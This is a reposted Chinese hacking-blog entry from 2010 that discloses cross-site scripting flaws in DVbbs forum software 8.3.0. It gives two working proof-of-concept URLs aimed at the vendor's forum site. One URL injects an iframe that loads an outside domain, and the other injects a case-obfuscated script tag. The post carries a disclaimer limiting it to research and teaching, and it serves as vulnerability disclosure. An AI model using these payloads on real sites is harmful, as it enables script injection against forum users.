=波波日志 > 黑客技术 > 动网(DVbbs) Ver 8.3.0 多个跨站漏洞=

[转]动网(DVbbs) Ver 8.3.0 多个跨站漏洞

动网论坛做为目前国内最大的社区论坛软件服务提供商,依靠其强大的功能、非凡的访问速度和负载能力、友好方便的客户操作界面、优质的客户服务、国内领先的 技术和强大而持续的产品研发并保持不断创新的能力,动网所提供的动网社区论坛产品已经占据了国内社区论坛产品使用比例的70%以上。

目标网站对用户提交的变量代码未进行有效的过滤或转换,允许攻击者插入恶意WEB代码。

测试代码1:

http://bbs.dvbbs.net/showerr.asp?BoardID=8&ErrCodes=60&action=%22%3E%3Ciframe%20src=%22http://www.51chi.net/qing%22+qing

动网论坛漏洞


测试代码2:

http://bbs.dvbbs.net/index.asp?boardid=8&TopicMode=0&List_Type=%27%22%29%3b%3E%3C%2fIfRaMe%3E%3CscRiPT%3Ealert%28%27www.51chi.net/qing%27%29%3C%2fScrIPT%3E


 

动网论坛漏洞

提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

http://hi.baidu.com/isbx/blog/item/3811aa64ad24f5fcf6365410.html

类别:黑客技术 作者:转载 日期:2010-05-04 【评论:0】 
 
暂时没有评论!
发表留言
  • *昵称:
  • 头像:
  • 电子邮件: [留下您的邮件,方便管理员回复您。]
  • 个人网站: *验证码:
声明:本网站尊重并保护知识产权,根据《信息网络传播权保护条例》,如果我们转载或引用的作品侵犯了您的权利,请通知我们,我们会及时删除!
Powered by showbo,©2012WEB编程网桂ICP备05005887号 京公网安备1101055090